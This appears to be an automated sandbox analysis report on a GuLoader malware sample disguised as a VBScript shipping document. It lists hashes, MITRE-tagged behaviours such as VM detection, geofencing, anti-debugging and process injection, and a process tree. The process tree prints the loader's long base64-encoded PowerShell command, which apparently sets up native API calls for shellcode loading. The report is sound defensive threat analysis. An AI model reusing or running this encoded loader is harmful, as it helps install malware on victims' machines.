guloader | 27b950f8b84e372d1b9d0fd7b918cb633eaa2556ef47c63baf0b916f04f5bffd

General

Target

Draft_shipping_document.vbs
Size

805KB
MD5

3d283fd545af947a47e6953d6335b98a
SHA1

331b837d008efc12c0702b290c747581583169fd
SHA256

280925849cd341c089c250b6609a0cab91026578f98bc2c45cb924dc9c8967a5
SHA512

c954754254c31cf881bb96efc601b683ae9ba75a90054626186ac9392958bc5cb3bdc3b1348df3885f998002c0a3c523fd744b29bc149b9894bb04d480bf602c

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	WScript.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

4888 powershell.exe
1040 ieinstal.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4888 set thread context of 1040 4888 powershell.exe ieinstal.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

4888 powershell.exe
4888 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

4888 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4888 powershell.exe

pid	process
4888	powershell.exe
1040	ieinstal.exe

description	pid	process	target process
PID 4888 set thread context of 1040	4888	powershell.exe	ieinstal.exe

pid	process
4888	powershell.exe
4888	powershell.exe

pid	process
4888	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4888	powershell.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

WScript.execmd.exepowershell.execsc.exe

description	pid	process	target process
PID 2440 wrote to memory of 3256	2440	WScript.exe	cmd.exe
PID 2440 wrote to memory of 3256	2440	WScript.exe	cmd.exe
PID 3256 wrote to memory of 4332	3256	cmd.exe	attrib.exe
PID 3256 wrote to memory of 4332	3256	cmd.exe	attrib.exe
PID 2440 wrote to memory of 4888	2440	WScript.exe	powershell.exe
PID 2440 wrote to memory of 4888	2440	WScript.exe	powershell.exe
PID 2440 wrote to memory of 4888	2440	WScript.exe	powershell.exe
PID 4888 wrote to memory of 2348	4888	powershell.exe	csc.exe
PID 4888 wrote to memory of 2348	4888	powershell.exe	csc.exe
PID 4888 wrote to memory of 2348	4888	powershell.exe	csc.exe
PID 2348 wrote to memory of 1520	2348	csc.exe	cvtres.exe
PID 2348 wrote to memory of 1520	2348	csc.exe	cvtres.exe
PID 2348 wrote to memory of 1520	2348	csc.exe	cvtres.exe
PID 4888 wrote to memory of 1040	4888	powershell.exe	ieinstal.exe
PID 4888 wrote to memory of 1040	4888	powershell.exe	ieinstal.exe
PID 4888 wrote to memory of 1040	4888	powershell.exe	ieinstal.exe
PID 4888 wrote to memory of 1040	4888	powershell.exe	ieinstal.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

4332 attrib.exe

pid	process
4332	attrib.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Draft_shipping_document.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2440

C:\Windows\System32\cmd.exe
cmd /c attrib
2⤵
- Suspicious use of WriteProcessMemory
PID:3256

C:\Windows\system32\attrib.exe
attrib
3⤵
- Views/modifies file attributes
PID:4332

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAFAAVQBUAFQARQBSACAAUgBzAG8AbgBuAGUAcgA5ACAAcwBhAGcAbABpAGcAIABSAEUAUwBVAEwAVABFACAAcwB0AGEAbgBpAHQAcwAgAHAAbwB6AHoAeQBzAGsAIABVAGQAZwByAGYAdABsACAAQwBlAG4AdAAgAEQAaQBzAGsAYgBlAHQANgAgAEgAVgBJAFIAIABDAG8AcwBtAG8ANQAgAEcAcgBhAGQAaQBvAG0AZQB0AHIAIABBAGwAdABhAGkAYQAxACAAZQBuAGkAZwAgAGwAYQBtAGEAaQAgAEgAYQBiAGkAbABlAHMAIABBAEsARQBCAEkARwBZAEwAVAAgAHQAaQBsAGYAagBlAGQAZQBzAGMAIABTAHUAZQB2AGkAZwB0AGkAZwAzACAAQQBuAGEAZwBvAGcAaQBjACAAcgBhAGcAbQBhAG4AbQAgAFUARABWAEkASwBMAEkATgAgAFMAawByAGkAZwBlAG4AZwAgAEYAYQBhAHMAcwB1ACAATQBvAG4AdABlAHIAMgAgAEIAcgBvAGkAZABlAHIAaQAxACAAQgBlAHMAawB5AGQAbgAgAFYAZQByAHQAaQBjAGEAbAAgAA0ACgAjAHQAYQBjAGgAIABIAG8AcgBzAGUAdwBhAHkAOQAgAEoATgBFAEQARQBTAFcARQBMAEwAIABtAGEAbgBkAGYAIABHAGUAbQBtAGUAcwB0ACAASQBtAG0AdQBuAGQAdQA1ACAARgBBAFMAVABFAE4ARQBEAEIAIABGAGwAbwByAGEAbAAxACAAQQBmAHQAcgBkAGUAbAA4ACAAQQBwAHAAZQB0AGkAdABvACAATgBhAHQAYQAyACAAUwBUAEEARgBGACAAQwB5AHIAZQBuAGkAYQBuADMAIABLAEwAVgBFAFIATgBFAEMASABFACAAZgBsAHMAbwBtACAATQBFAEcAQQBMACAAUwBQAFIASQBOAEcARQBSACAAQQBwAHAAbwBpAG4AdABzACAAbgBlAGcAYQB0AGkAdgAgAEIAbABlAG0AbQB5ADMAIABTAHkAbABsAG8AZwBpAHMAIABzAG8AbABhACAARABFAFMAWQAgAE0ATwBEAEUAUgBOAEkAIABzAGwAbwBuAG8AbQBkAGUAIABDAG8AbQBtAHUAbgBhAGwAIABIAGUAdABlAHIAbwBjAGgAaQAzACAATwBUAEkARABJAFAASAAgAFUAZAB2AGkAawBsAGkAbgBnACAARgByAGEAbgBkACAAVwBPAE4AVABJAE4ARwBTAE0ARQAgAEQAVQBNAEEAIAANAAoAIwBOAG8AbgBkAGUAYwBhADMAIABsAGEAYwB0AGkAIAB0AHIAYQBuAHMAdQBtAHAAdABpACAAQQB1AHIAaQAgAEEAdAB0AGUAcwA3ACAATwBOAEsARQBMAEUATgAgAGYAbAB5AHYAZQAgAFUATgBSAE8ATwBTAFQAUwBQAE8AIABhAGIAZQBmAGUAIABQAGgAeQBzACAAVQBuAGMAdQByAHIAaQAxACAATQBvAHoAYQBtAGIAaQBjADgAIABDAFIATwBBAEsAUwBQAEgATwBUACAAbwBwAGwAYQBnAGUAbgAgAEcAbgBhAHMAawBlADcAIABkAHkAcwBmAHUAbgBjAHQAaQBvACAARwByAG8AdwBsAGkAIABSAGgAaQB6AG8AdABhAHgAIABIAGEAcwB0AGIAZQB2AGEAZQBiADIAIABMAHUAYgBiAGUAcgBsAHkAcwB0ADEAIABUAGEAbABpAG8AbgBpAGMAMwAgAEEAawBhAG8AdQB0ACAAVABIAE8AUgBBAEMATwBMAFkAIABHAHIAYQBuACAAVABBAEcARQBOAEUATQBJAFMAVAAgAEsAbwBtAG0AdQBuAGkAIABBAEEAUgBFAEwATwBEAEUAUwAgAEQARQBUAE8AIABUAHIAaQBwAGwAaQBjAGEANAAgAHUAbgBjAG8AbgBmAGUAcgByACAADQAKACMASwBhAHAAaQB0AGEAbABzAHQAIABTAHAAdQByAHQAcwA1ACAAVQBuAGQAZQByAGcAcgBhAGQAdQAgAEUARABFAEwASABBAFIAVAAgAE0ARQBHAEEATABPAE0AIABLAGEAcgBhAG0AYgBvACAAYgBhAGwAawBhAG4AaQBkAGUAIABBAHQAdAByAGkAYgB1AHQANQAgAG0AdQBzAGkAawB0AHkAIABGAGwAagB0ACAAUABhAGMAaAB5AGgAYQBlACAAawBhAHQAaQBwAHUAbgBhAG4AIABVAG4AZABlAHIAcwAgAE0AcgBrAGUAbABvAHkAMQAgAFIAYQBkAGUAcgBuAGEAIABCAGwAbwBkAHAAcgBvAHAAcAAgAFUATgBDAEwARQBGACAAVgBlAGoAcgBzAGEAdABlADEAIABIAE8AVgBFAEQAUwBLAFIATQBFACAAQQBwAHQAZQByAGUAcgBlAHMAcAAgAFQAZQBhAGsAdAByAHMAcwA4ACAAYgByAG4AZQBoAG8AcwBwACAADQAKACMAVABTAEUAVABTAEUAIABGAHIAZQBtAHMAawByAGkAZAA2ACAAYgBhAGcAcwBkACAASAB5AHAAbwB0AG8AbgA2ACAAZABlAG0AYQBnAG4AZQAgAGQAZQBiAHUAdABhAG4AdAAgAEQAZQByAG0AbwBiAHIAYQA5ACAAVQBmAHUAbABkAGsAIABnAGEAcgBiAHMAYgBvAG4AIABDAG8AYQB4AGkAbgBnAGIAeQByACAAUABsAGEAcwAyACAAZgBvAHIAZQBuAGkAbgBnAGUAIABNAGUAbABhAG0AcABzAG8AcgBhADkAIABmAHIAZQBtAHQAIABuAG8AbgBwAGUAIABiAGEAcgB5AG8AbgB1AGQAbAAgAFYAaQB0AHIAaQBmAGEAYwB0AGkAIAANAAoAIwBVAG4AdwBlACAATgBvAG4AZQBwAGkAYwBhAGwAbAA2ACAAVgBFAEQARQBSACAAdQBuAGcAbwBsACAAcwBhAG4AZwBkACAASwBOAFMAVABSAE0AUAAgAFMATQBBAEEAVgBBACAAVABhAGkAbABnAGEAIABFAEEAUgBUAEgAQgBSACAAUwBpAGUAZwBsAGkAbgBnAGkANgAgAGMAYQBsAHkAcAB0ACAATQBJAEMAUgBPAE4ASQBaAEUAIABwAGUAcgBzAG8AbgAgAA0ACgAjAFAAaQB6AHoAaQBjACAASwBhAGwAdgBlAGwAZQB2ACAAcwBjAG8AbABlAGMAbwBsAG8AZwAgAEsAYQBuAHQAaQAgAFMAdABvAGwAcABlAGQAZQBzADkAIABEAFIATgBVAE0ATQBFAFIAVwBJACAAZQB0AGgAZQBvAHMAdABvAG0AIABFAEwARQBDAFQAIABSAGgAeQB0ADQAIABTAHQAaQBrAHAAcgB2ADMAIABQAGUAbABvAHQAYQByAGUAIABCAGUAawByAGYAdABlAHIAMwAgAEYATABFAFgASQBCACAAQgBOAEQATABFAFQAIABUAGUAcwB0AHMAeQBzAHQAZQBtADgAIABNAEkATgBFAFIAIABUAG8AeABvACAAYgB1AGUAbABhACAASABqAGUAcgB0AGUAcwBhAGcAIABTAGsAYQB0ADgAIABDAGgAaQBtAGkAcQB1AGUAbQBpACAAUwBIAE8AVABTAEgARQBMACAAVQBuAGkAcwBlAHgAdQBhAGwAIABSAEUAQQBMAFMASwBPAEwARQAgAEkAbgB0AGUAcgBwAG8AbABhACAASABlAGEAZABzACAAYQBmAHMAZQByAHYAYQByACAAVQBsAHUAbABhAHQAIABSAGUAcABhAGcAYQBuAGkAegBlADIAIAANAAoAIwBOAGEAYgBvAGIAcwBoAGkAcAA2ACAAcABvAG8AZgAgAG8AdgBlAHIAdwBlAHQAdAAgAFIAZQBqAGUAYwB0AG0AIABlAGwAaABlAGcAbgBlAG4AZQBzACAARgBlAHIAdABpAGwAZABhACAAQQBNAEEAWgBPAE4AIABTAEEATgBEACAAVQByAGYAdQBnAGwAIABHAGEAbQBvAHMAdABlAGwAZQBzACAAcAByAG8AYwBvAG0AYgBhAHQAbwAgAEIAYQBnAHYAYQBzAGsAZQBsAHMANQAgAFUAbgBkAGUAcgBuAG8AdQByAGkANwAgAFIAaQBtAGUANQAgAEEAbQBiAGkAdgBhACAATABlAGoAbABpAGcAaABlACAATAB5AHMAaQA1ACAAbABpAHMAdABlAHUAZABzAGEAIABkAGUAbwBkAG8AcgBpAHMAZQAgAGkAbgBnAGUAbgBpAHIAcwAgAEMAQQBDAE8AWgBZAE0AIABKAEEATQBBAEkAIABzAHQAYQBuAGkAZQBsAHAAZQBjACAATQBpAHMAawByAGUAZABpAHQAZQAgAHUAZABtAHIAawBlAGwAcwAgAGcAcgB1AGIAbgBpACAAaABhAGUAbQBvAGMAeQAgAFMAcAByAGkAdABrAHIAcwBlAGwAIAANAAoAIwBNAG8AbgBvACAATgBvAG4AaQBkAGUAYQB0ADkAIABIAGUAcgByAGUAZQAgAEYAbwByAGoAdQBkACAARQBTAE8AUABIACAAUwBPAEMASQBPAEwATwBHACAAZQBhAHIAdAAgAGcAcgB5AGwAbAAgAFMAZQBtAGkAbwAyACAASABlAG0AaQBhAGIANgAgAEkATgBEAEsAQQBMACAAVgBpAGQAdABsAGYAdABpAGcAIABUAFUAUgBJAFMAIABHAGEAdQBzAHMANQAgAEsATwBSAFQAVgAgAEQAZQBrAG8AcgA4ACAADQAKACMAQQBGAEsAUgBGAFQAIABGAGkAbABtAHMAZQBsAHMAawBhADEAIABFAG0AYQBuAHUAZQBsAGUAdQBkADcAIABSAGUAYwBlAGkAdgBlAHIAcwAgAEsARgBFAFIAVABEAEkAIABFAE4AVABPAE0ATwBMAE8AIABQAHIAZQBmADMAIABVAHAAbQBhAG4AcwBoAGkAcAB2ACAATgBlAHAAaAByAG8AcABlAHgAMgAgAEwAcwBlAHAAcgBvAGMAIABQAGwAaQBjADkAIAANAAoAIwBVAGQAcwB1AGcAZQByAGUAIABmAHUAbABkAHYAbwBrACAAdQBkAHIAZQAgAFUATgBNAEUATgAgAEcAdQBpAGQAZQAgAEoATwBSAEQAQgBFAFMASQAgAEsAcgB5AHAAMwAgAHMAZQBhAHIAYwBoACAARgBpAGYAdAB5AHAAZQBuAG4ANwAgAEYAUgBFAFMASQBBAEUAIABBAGkAbgBhAHMAbwBwADEAIABSAEEAVgBBAEcASQBOAEcATABJACAAQwBPAE4AUwBUAFUAIABGAEkATQBCAFIARQAgAE4ATwBOAEEAIABUAFIATwBOAEIARQBTACAAZwBsAHUAaQBuAGUAIABUAGkAZABzAHMAaQA4ACAAUwB0AHIAdQB0AGgAaQBvAGkAZAAgAGMAbwBuAHYAZQByAHMAIABWAEUAWABJAEwATABJAEMARQAgAEwAYQBtAGkAbgBhAHIAaQAxACAATgBhAHAAcABhAHMAawAzACAAUABpAHAAcAAyACAAZABvAHQAaABlAHIAawAgAA0ACgAjAFAAUgBPAEIATABFAE0ARgBZACAAVABoAHkAcgAxACAAUwBhAG4AcwBlAGIAZQBkAHIAYQAgAFAAQQBSAEEATAAgAGEAcgBrAGEAaQBzACAATwBwAGIAeQBnAG4AaQBuAGcAIABCAEUAVABPAE4AIABGAE8AUgBVACAASwBhAGgAeQB0ADIAIABiAGEAbgBlACAAQQBjAGMAcgB1ADMAIABCAHUAbgBrAGUAYgByAHkAbABsADUAIABDAHIAbwB1AHMAdABhAGQAZQB0ACAAbQBhAG4AaQBsAGEAbQByACAAQQBuAGEAcAAgAEkAbgBvAHMAYwB1ADIAIABlAG4AYQBrACAASgBhAGwAbwB1ADgAIABIAGEAaQByAGIAZQBsAGwAZQBzADkAIABFAGQAZABlAHIAawBvAHAAMgAgAGUAeABjAGkAcwBhAGIAbABlAHUAIABPAGwAZQBzADUAIABUAHUAcgBiAGUAIABmAG8AcgBlAGQAIABSAHkAZwB0ADQAIAANAAoAIwBQAEEAUABJAFIAIABLAEwAUwBPAFYARQAgAEEATABHAE8ATABPAEcAIABCAGUAZAByAGkAdgBlAHMAcABpACAAQQBTAEMATwBUAEIAWQBTAFMASQAgAEgAdQBtAG8ANQAgAEsAdQBwAGUAcgBlAG4AMwAgAFUAbgBkAGUAcgBqAHUAZABnADQAIABmAHIAYQBzAGsAcgBpAHYAZQBuACAAcwBxAHUAYQAgAFAAcgBlAGMAZQByAGUAbQAxACAADQAKACMAVABSAEEARQAgAGwAZQBjAHkAdABoAHUAcwBmAG8AIABTAFQAQQBSAFYARQAgAGsAdQBkAHUAbwB2AGUAIABCAGUAawBtAHAAZQBsACAAQwBhAHkAZQA0ACAATQBVAFQASQAgAE8AUABTAEwAVQBHAE4ASQBOAEcAIABSAEUAUABSAE8ARABVAEMASQBCACAAbQB1AGQAaABvAGwAZQBkAG8AZwAgAGMAdQByAHIAIABGAG8AcwBmACAAUwBjAGwAZQByADUAIABBAHIAYQBiAGEAYgBsADEAIAANAAoAIwBQAG8AbABsAGkAYwA2ACAAQwB1AHAAcgBlAGkAMgAgAEwAQQBZAFMAUABSAEUAIABiAGEAbAB1AHQAZAByAGIAeQB1ACAARwBlAHMAdABpAGMAbwA0ACAAcwBlAG4AcwBpAGIAaQBsAGkAdAAgAFAAYQByAGEAZgBmADgAIABDAFUATABUAEkAVgAgAE8AdgBlAHIAIABBAHYAbABzAGcAYQA3ACAAYQBuAHMAdAByAGUAbgBnACAAUwBFAE4ASQBMAEsATwBOAEYAIABzAHAAZQBsAGUAbwBnAGUAbgBlACAASABBAEwAQQBLAEkAUwBUAFMAVAAgAEcAUgBPAFUATgBEAEgATwBHAFMAIABkAGEAZwBkAHIAIABGAEwAUwBFAFIATgBFAFMATQAgAEYAaQBuAGYAbABlAGwAcwBlAHMANQAgAEMAWQBDAEwATwBTAFQAWQBMACAAYwBpAG4AZQBtAGEAcwBjAG8AIABUAGUAawBzACAAZwBhAHMAdAByAG8AbAB5ACAAUgBFAE0ARQBNACAADQAKACMAZABoAHkAYQBuAGEAIABFAEMAVABPAEcARQAgAGQAaQBmAGYAZQByAGUAbgB0ACAASABBAEEATgBEAE8AUABUAFIAIABVAEwAVgBFAFMAIAB2AGkAZQB0ACAAZwBlAG0AbwBsACAAVQBOAEQARQBSAFMAIABDAHkAZQBzACAARAByAGUAcwBzAHUAOQAgAFMAYQBuAGkAdABlAHQAcwBrAG8ANAAgAEgAagB0AGkAZAAgAFQASQBNAE0ASQBTAE4ATwAgAHAAYQByAHQAaQBvAHIAZwBhACAAWgBvAG4AZQBsACAAUgBkAGcAYQByAGQANwAgAEMATwBHAE0AQQAgAGsAbwBtAG0AYQB0AGUAcgAgAGgAZQBtAGkAcgAgAEwAQQBEAFkATABJAEsAIABtAGEAYQBsAGUAbgAgAEcAeQBuAGEAbgBkAHIAbwBwAGgANwAgAEEAbABlAHkAcgBvAGQAaQBkADUAIAANAAoAIwBSAGEAZABpAG8ANAAgAEMAYQByAHkAbwBwADcAIABBAEYAVABFAFMAVABBAEIAVQBaACAAYgBhAGMAawAgAGEAbABrAHkAbABhAG0AaQBuACAAQgByAHkAcwB0AHMAMQAgAGsAbwByAHMAZQAgAHMAdABhAHYAZQAgAEYAWQBSAFQATwBFAEoAIABLAE8ATABMAE8ASQBEAEUAUgBOACAAVQBEAEwAQgAgAEQAZQBkAHUAYwBlAHIAOAAgAFYASQBSAEsAUwAgAEwAbwByAG8AIABJAGMAbwBuAG8AbQBhAHQAIABrAG8AbQBwAGEAIABEAGkAYwBoAGwAbwByADQAIABCAGkAbABhADEAIABTAGEAbQBhAHIAMgAgAEMASABPAEkATABFAFIAUAAgAFMAYQBtAG0AZQBuACAAQwBoAGUAYwAgAFcAaQBuAGQAbAAgAFIAaQBuAGQAbABlADUAIABVAEQAQQBOAFMASwBFAFMAUwAgAHMAbwBsAHYAbwBnAG4AZQBzAHMAIABMAEEAVgBQAEEAIABTAGgAYQBjAGsAbwBwAGgAZQAgAFQASQBOAEsARQBSAEwASQBLAEUAIABTAHUAbQBlADgAIABUAG4AZABlAGwAaQBnAGMAbwBuACAAbQBhAGwAYQBjACAADQAKACMAVQBEAEEARABWAEUATgBEACAAbQBlAGQAbABlACAARQByAGgAdgBlAHIAIABrAGEAYgBiAGEAbABpAHMAIABQAFIASQBDAEsAIABTAGUAbQBpAHAAbwBzAHQAYQA2ACAAbgBvAG4AYwBvAG4AcwAgAEMAQQBKAEEATgAgAE8AVQBUAEcATgBBAFcASABPAE0AIABTAGsAcgB0AGUAOQAgAGgAZQBuAHMAaQBnAHQAcwBtACAAcwBjAGgAZQBkAHUAIABIAGEAdQBzAHQAbwByAGkAYQAgAFAAcgBlAGMAbABpADUAIABCAEkAVABUACAAcwB0AHIAaQBkAHMAcwBrAHIAIABBAG4AZwBsAG8AbQBhAG4AZQAyACAAUwB1AHAAcAA5ACAAQgBhAGcAYQB0AGUAbABsAGUAcgAyACAAQgByAGEAbQBpADkAIABTAFQARQBOAEgAVQAgAEgATwBNAE8AIABsAGcAZQBtAGkAIABOAGUAcABoAHIAbwBuAGMAdQA1ACAADQAKACMAQgByAGwAZQA1ACAATQBlAHoAcQB1ADEAIABzAGwAYQBrAGUAIABQAEUATgBJAEIARQAgAGsAbwBuAHQAcgBpAGIAIAB0AG8AcgBuAHMAawBhAGQAZQAgAEIAUgBLAE0ASQBEAEwARQAgAGcAaQB1AGwAaQBvAGQAZQB0AHIAIABTAFQATwBFAEQAVABDAEgASQBMACAATQBlAHQAZQA5ACAAVAB1AGYAbwBsAGkAcgBvAGUAcwAgAGIAYQBjAGsAcwB0AG8AIABVAGQAYgB1AGQAcwAgAEIAQQBOAE4AIABGAE8AUgBCACAATQBhAGcAaQBzAHQAZQByAGYANAAgAFMAdQBiAGsAdQB0AGEAbgB0ACAAUwBlAGoAcwBlAGQAIABDAEgAQQBOAEMAIABiAGkAbABsAGkAZwBsAHMAIABFAEMAVABPAEUATgBaAFkAIABNAGkAbAB0ACAADQAKACMASABPAFcAUwBPAEUAVgAgAHIAbwB1AHMAZQBzAHAAIABHAEEATABWACAAVQBuAHMAdQBiADEAIABTAE0ASwBLAEUAVABEACAATwB1AHQAcAA3ACAAQwBPAE4ATwAgAFYAcgBkAGkAcgBlAGQAdQA1ACAASABBAFQAQwBIAEUAQwBLACAAUwBvAGcAbgBlAHYAZQAgAFIARQBKAEkAIAB0AGEAaQByAGcAIABjAGEAcgBiAG8AbAAgAEsAVgBBAEoARQBWAEkAIABTAE4AQQBLAEUAIABVAG4AbQBpAGMAcgBvAGIAaQAgAEsATgBZAFQATgBJAE4ARwAgAGIAYQByAG4AYQBnAHQAaQBnAGgAIABJAEwATABBAFQAIABCAFUAUgBFAEEAVQAgAFIASABBAEIARAAgAEwAdQByAGkANQAgAA0ACgAjAE4AbwBzAG8AZwBlAG8AMQAgAEQASQBTAEYAIABCAGUAbABvADUAIABOAGkAYwBvADIAIABFAFAASQBLAE8AIABmAG8AcgBzAHkAIABTAHkAbQBwAGEAdAAgAEIAagByAGcANAAgAEgAZQBiAHIAaQBzAGsAZQBhAGwAIAByAGUAdAByAGEAbgBzAG0AaQAgAFMASQBHAE4ARQBUAEUAVABTAEEAIABLAG4AZQBlAGwAZQBkAHMAcABpADgAIABTAHQAdQBuAHQAaQA0ACAARwByAGEAdgBhADEAIABSAGUAcgBhAG4AcwBrACAAVQBOAEUATABEAEUAUgBMAFkAIABGAG8AcgBnAG4AZwAgAHIAZQBpAG4AaAAgAGkAcwBvAGMAcgB5AG0AaQAgAE0AbwBuAG8AdABvAG4AbwB1ADQAIABtAGUAcwBvAHQAaABlAHIAIABUAEkATABCAEEARwBFAFYARQBKACAARABFAE4ARABSACAAYwBlAHIAdABpAGYAIABQAGkAbABlAHMAcABpAGQAcwAgAFMAZQBqAGwAcgBlAG4AZABlAGgANQAgAA0ACgAjAGIAYQBrAGUAcwBjACAAQQBmAGwAZQBkADkAIAB2AGEAcwBrAGUAbQBpACAAVAByAGEAbgBzAG0AZQA2ACAATQBvAHUAcgBuAGYAdQBsAGwANQAgAG0AYQBjAHIAbwBwAHIAaQAgAFAAYQByAHQAaQBlAGQAbgAyACAAUABiAGUAbABhAGcAOAAgAFQAdQByAGIAbwBqAGUAdAB0ACAARQBSAE0AQQBOAE4ATwBTACAAYQB1AGMAYQBuAHIAdQAgAEUAUgBZAFQASABSAE8AIAByAGUAZwBpAG8AbgBzACAAcABoAGkAbABvAGwAbwBnAHEAIABIAHUAbQByAGUAeAAgAE4AaQBoAGkAbABpAHMAdAAyACAASwBhAGwAaQBiAHIAZQByAGUAdAAgAE8AdgBlAHIAcwAgAE0AZQBsAGkAYwByADcAIABLAGEAcgBhAGsAdABlAHIANQAgAE0ASQBEAEQAQQBHACAATwByAGIAaQB0AG8AegB5AGcAbwA1ACAADQAKACMAbgBkAHIAaQBuAGcAcwBwAGwAIABUAHIAaQBlAHIAbwB2AGUAIABDAGkAbgBkAGUAcgBsAGkAawA2ACAAbABhAG4AZwB1AG8AcgBvACAAUwBuAGkAZgB0AHAAYQByACAARABpAHMAYgB1AHIAcwBlADkAIAByAGEAawBpAGoAYQBzAHUAcwAgAGMAaQB0AHkAdABhAHMAawBlACAAcwBpAG4AYQBwAGkAbgAgAE0AeQBjAGUAbABpAGUAdAB2ADkAIABlAHYAaQByAGEAdAAgAEwAcwBlAGEAZABnACAADQAKACMARgBJAFIAUwBUAEMAIABFAE0AQgBPAFMAIABLAGkAdAByAGUAcgBpACAAUgBlAG4AaABvACAATwB2AGUAcgBnACAARwB1AGwAcAAgAGUAdQByAG8AYwBoAGUAawBwACAATABhAGMAdABvACAAQgBBAEwAQQBOAEMARQBSACAAQwBvAG0AcABvAHMAdAB1AHIAIABTAEUASgBMAEwAIABUAGUAawBzAHQAaQBsAGYAYQByADMAIABEAGkAcwB0AHIAaQBrAHQAcwBiADQAIABUAE8AUgBUAFUAIABhAGYAcwB0AHQAZQAgAFQAcgBhAGEAZAAgAGgAZQBtAGUAIABTAGEAbABnAHMANwAgAFAAcgBvAHAAIABnAGUAbgB2AGUAagAgAEUAUABJAEMAWQBFAFMAIABiAGUAYQBhAG4AZABlAHMAIAANAAoAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAFEAdQBpAGwAbAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACwARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQB1AHoAdQBuAG4AYQAoAGkAbgB0ACAAUQB1AGkAbABsADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAFcASABFAEUATABDACwAaQBuAHQAIABEAEUAVABFAFIATQBJACwAcgBlAGYAIABJAG4AdAAzADIAIABRAHUAaQBsAGwALABpAG4AdAAgAFIAZQBsAGkAZQB2AG8AZAA2ACwAaQBuAHQAIABRAHUAaQBsAGwANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABTAE8ATABJAFQAUgBQACwAdQBpAG4AdAAgAFIAYQBtAGEAcwBrAHIAaQBnADcALABpAG4AdAAgAEEAbgB0AGkAYwBvADcALABpAG4AdAAgAFEAdQBpAGwAbAAwACwAaQBuAHQAIABmAGwAYQBnACwAaQBuAHQAIABwAG8AbABpAG8AZQAsAGkAbgB0ACAAQgB1AG4AZABnAGEAcgBuAHMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARABFAFQARQBSAE0ASQAwACwAdQBpAG4AdAAgAEQARQBUAEUAUgBNAEkAMQAsAEkAbgB0AFAAdAByACAARABFAFQARQBSAE0ASQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABEAEUAVABFAFIATQBJADMALABpAG4AdAAgAEQARQBUAEUAUgBNAEkANAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGcAZABpADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAATABpAG4AZQBEAEQAQQAoAGkAbgB0ACAARABFAFQARQBSAE0ASQA1ACwAaQBuAHQAIABEAEUAVABFAFIATQBJADYALABpAG4AdAAgAEQARQBUAEUAUgBNAEkANwAsAGkAbgB0ACAARABFAFQARQBSAE0ASQA4ACwASQBuAHQAUAB0AHIAIABEAEUAVABFAFIATQBJADkALABpAG4AdAAgAFEAdQBpAGwAbAAwACkAOwANAAoADQAKAA0ACgB9AA0ACgAiAEAADQAKACMAVgBnAHQAbABmAHQAMwAgAGEAawBlAG4AZQBzAHMAagAgAE4ATwB